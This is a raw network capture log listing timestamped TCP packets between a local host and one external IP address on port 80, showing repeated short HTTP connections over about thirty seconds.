                                                                                                                          Dec 26, 2024 22:32:55.555139065 CET4976280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:55.676665068 CET804976237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:55.676678896 CET804976237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:55.676691055 CET804976237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:56.576045990 CET804976237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:56.633167982 CET4976280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:56.824353933 CET804976237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:56.930175066 CET4976280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:56.949877024 CET4976280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:56.950594902 CET4976480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:57.070173025 CET804976437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:57.070383072 CET804976237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:57.070436954 CET4976480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:57.070467949 CET4976280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:57.070867062 CET4976480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:57.194052935 CET804976437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:57.430465937 CET4976480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:57.550421000 CET804976437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:57.550542116 CET804976437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:57.550553083 CET804976437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:57.962358952 CET4976480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:57.963418961 CET4976580192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:58.085230112 CET804976537.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:58.085314035 CET4976580192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:58.086158991 CET4976580192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:58.088336945 CET4976680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:58.131256104 CET804976437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:58.136344910 CET804976437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:58.136409044 CET4976480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:58.209927082 CET804976537.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:58.213318110 CET804976637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:58.213407993 CET4976680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:58.213553905 CET4976680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:58.334286928 CET804976637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:58.430187941 CET4976580192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:58.551434040 CET804976537.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:58.552041054 CET804976537.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:58.573369980 CET4976680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:58.697084904 CET804976637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:58.697097063 CET804976637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:58.697105885 CET804976637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:59.537650108 CET804976537.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:59.586328030 CET4976580192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:59.734857082 CET804976637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:59.788000107 CET804976537.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:59.789441109 CET4976680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:59.836301088 CET4976580192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:59.992500067 CET804976637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:00.039534092 CET4976680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:00.193193913 CET4976580192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:00.193355083 CET4976680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:00.194148064 CET4977280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:00.319822073 CET804977237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:00.319891930 CET4977280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:00.319936037 CET804976537.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:00.319992065 CET4976580192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:00.320244074 CET804976637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:00.320939064 CET4976680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:00.322792053 CET4977280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:00.445945024 CET804977237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:00.680870056 CET4977280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:00.801628113 CET804977237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:00.801645994 CET804977237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:00.801659107 CET804977237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:01.774118900 CET804977237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:01.820672989 CET4977280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:02.023785114 CET804977237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:02.070683002 CET4977280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:02.146975040 CET4977280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:02.147718906 CET4977580192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:02.270102978 CET804977237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:02.270412922 CET4977280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:02.271841049 CET804977537.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:02.271917105 CET4977580192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:02.272056103 CET4977580192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:02.392559052 CET804977537.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:02.617747068 CET4977580192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:02.737989902 CET804977537.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:02.738018990 CET804977537.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:02.738035917 CET804977537.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:03.640214920 CET804977537.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:03.695682049 CET4977580192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:03.892117977 CET804977537.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:03.945710897 CET4977580192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:04.028130054 CET4977580192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:04.029318094 CET4978080192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:04.243395090 CET804978037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:04.243407011 CET804977537.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:04.243486881 CET4977580192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:04.243697882 CET4978080192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:04.243697882 CET4978080192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:04.363487005 CET804978037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:04.604576111 CET4978080192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:04.725922108 CET804978037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:04.725933075 CET804978037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:04.727057934 CET804978037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:04.790705919 CET4978080192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:04.790712118 CET4978680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:04.916311026 CET804978637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:04.918967962 CET4978680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:04.919111967 CET4978680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:04.922202110 CET4978780192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:04.956552982 CET804978037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:05.042176008 CET804978637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:05.044894934 CET804978737.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:05.045212030 CET4978780192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:05.045367956 CET4978780192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:05.168143988 CET804978737.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:05.274000883 CET4978680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:05.300781012 CET804978037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:05.300863028 CET4978080192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:05.393589973 CET804978637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:05.393655062 CET804978637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:05.399023056 CET4978780192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:05.519114017 CET804978737.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:05.519126892 CET804978737.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:05.519130945 CET804978737.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:06.282514095 CET804978637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:06.336325884 CET4978680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:06.409409046 CET804978737.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:06.461308956 CET4978780192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:06.536233902 CET804978637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:06.586339951 CET4978680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:06.660068035 CET804978737.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:06.711323023 CET4978780192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:06.787220001 CET4978680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:06.787233114 CET4978780192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:06.787993908 CET4978980192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:06.907253981 CET804978737.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:06.907316923 CET4978780192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:06.907438993 CET804978937.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:06.907502890 CET4978980192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:06.907618999 CET4978980192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:06.907823086 CET804978637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:06.907936096 CET4978680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:07.027067900 CET804978937.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:07.258295059 CET4978980192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:07.378680944 CET804978937.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:07.378707886 CET804978937.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:07.378741026 CET804978937.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:08.269695044 CET804978937.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:08.320708036 CET4978980192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:08.520179033 CET804978937.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:08.570713043 CET4978980192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:08.811203003 CET4979480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:09.406245947 CET804979437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:09.406320095 CET4979480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:09.406961918 CET4979480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:09.526408911 CET804979437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:09.758739948 CET4979480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:09.878376007 CET804979437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:09.878446102 CET804979437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:09.878485918 CET804979437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:10.772070885 CET804979437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:10.820724010 CET4979480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:11.028211117 CET804979437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:11.070713997 CET4979480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:11.145818949 CET4979480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:11.147536039 CET4978980192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:11.148183107 CET4980080192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:11.265665054 CET804979437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:11.265733004 CET4979480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:11.267770052 CET804980037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:11.267843962 CET4980080192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:11.268089056 CET4980080192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:11.387573957 CET804980037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:11.544871092 CET4980180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:11.545278072 CET4980080192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:11.664427996 CET804980137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:11.664494038 CET4980180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:11.665016890 CET4980180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:11.705733061 CET804980037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:11.784528971 CET804980137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:11.804199934 CET4980280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:11.923907042 CET804980237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:11.923974991 CET4980280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:11.924135923 CET4980280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:12.023983002 CET4980180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:12.043569088 CET804980237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:12.158549070 CET804980137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:12.158560038 CET804980137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:12.275412083 CET4980280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:12.325349092 CET804980037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:12.325411081 CET4980080192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:12.395226002 CET804980237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:12.395239115 CET804980237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:12.395251036 CET804980237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:13.026992083 CET804980137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:13.070714951 CET4980180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:13.280186892 CET804980137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:13.287386894 CET804980237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:13.320702076 CET4980180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:13.336354017 CET4980280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:13.695322990 CET804980237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:13.742645979 CET4980280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:13.816216946 CET4980280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:13.816226959 CET4980180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:13.817035913 CET4980880192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:13.936023951 CET804980237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:13.936147928 CET4980280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:13.936496973 CET804980137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:13.936507940 CET804980837.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:13.936589956 CET4980180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:13.936589956 CET4980880192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:13.938957930 CET4980880192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:14.058440924 CET804980837.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:14.291220903 CET4980880192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:14.410787106 CET804980837.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:14.410798073 CET804980837.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:14.410840034 CET804980837.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:15.298512936 CET804980837.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:15.351998091 CET4980880192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:15.551964998 CET804980837.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:15.601974964 CET4980880192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:15.680577993 CET4981480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:15.800153017 CET804981437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:15.800250053 CET4981480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:15.800421953 CET4981480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:15.919831991 CET804981437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:16.148948908 CET4981480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:16.268651009 CET804981437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:16.268661022 CET804981437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:16.268733025 CET804981437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:17.163587093 CET804981437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:17.211339951 CET4981480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:17.416250944 CET804981437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:17.461347103 CET4981480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:17.573455095 CET4981480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:17.574789047 CET4982080192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:17.575848103 CET4980880192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:17.694219112 CET804981437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:17.694271088 CET4981480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:17.694890976 CET804982037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:17.694967985 CET4982080192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:17.695463896 CET4982080192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:17.814935923 CET804982037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:18.041296959 CET4982080192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:18.161252022 CET804982037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:18.161343098 CET804982037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:18.161353111 CET804982037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:18.290381908 CET4982080192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:18.290997982 CET4982180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:18.410506010 CET804982137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:18.410578012 CET4982180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:18.410749912 CET4982180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:18.416819096 CET4982280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:18.453648090 CET804982037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:18.530215979 CET804982137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:18.536308050 CET804982237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:18.536487103 CET4982280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:18.536690950 CET4982280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:18.656240940 CET804982237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:18.758034945 CET804982037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:18.758111000 CET4982080192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:18.758327961 CET4982180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:18.877784967 CET804982137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:18.877895117 CET804982137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:18.883462906 CET4982280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:19.003155947 CET804982237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:19.003170013 CET804982237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:19.003227949 CET804982237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:19.916299105 CET804982137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:19.916311979 CET804982237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:19.961410999 CET4982180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:19.961412907 CET4982280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:20.056112051 CET804982137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:20.101989031 CET4982180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:20.156294107 CET804982237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:20.213251114 CET4982280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:20.355760098 CET4982180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:20.355937004 CET4982280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:20.356786013 CET4982880192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:20.475764990 CET804982137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:20.476309061 CET804982837.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:20.476321936 CET804982237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:20.476391077 CET4982180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:20.476423979 CET4982280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:20.476466894 CET4982880192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:20.479254961 CET4982880192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:20.598763943 CET804982837.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:20.836496115 CET4982880192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:20.956166983 CET804982837.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:20.956177950 CET804982837.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:20.956193924 CET804982837.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:21.839435101 CET804982837.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:21.883678913 CET4982880192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:22.091885090 CET804982837.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:22.133239985 CET4982880192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:22.210201025 CET4982880192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:22.210587978 CET4983380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:22.330058098 CET804983337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:22.330377102 CET804982837.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:22.330482960 CET4983380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:22.330491066 CET4982880192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:22.334610939 CET4983380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:22.454163074 CET804983337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:22.680565119 CET4983380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:22.800226927 CET804983337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:22.800246000 CET804983337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:22.800328970 CET804983337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:23.693007946 CET804983337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:23.742630959 CET4983380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:23.948051929 CET804983337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:23.992619038 CET4983380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:24.069871902 CET4983380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:24.070519924 CET4983680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:24.189822912 CET804983337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:24.189898014 CET4983380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:24.190306902 CET804983637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:24.190377951 CET4983680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:24.190511942 CET4983680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:24.309976101 CET804983637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:24.539581060 CET4983680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:24.659135103 CET804983637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:24.659153938 CET804983637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:24.659251928 CET804983637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:25.087929010 CET4983680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:25.088625908 CET4984180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:25.208128929 CET804984137.44.238.250192.168.2.4
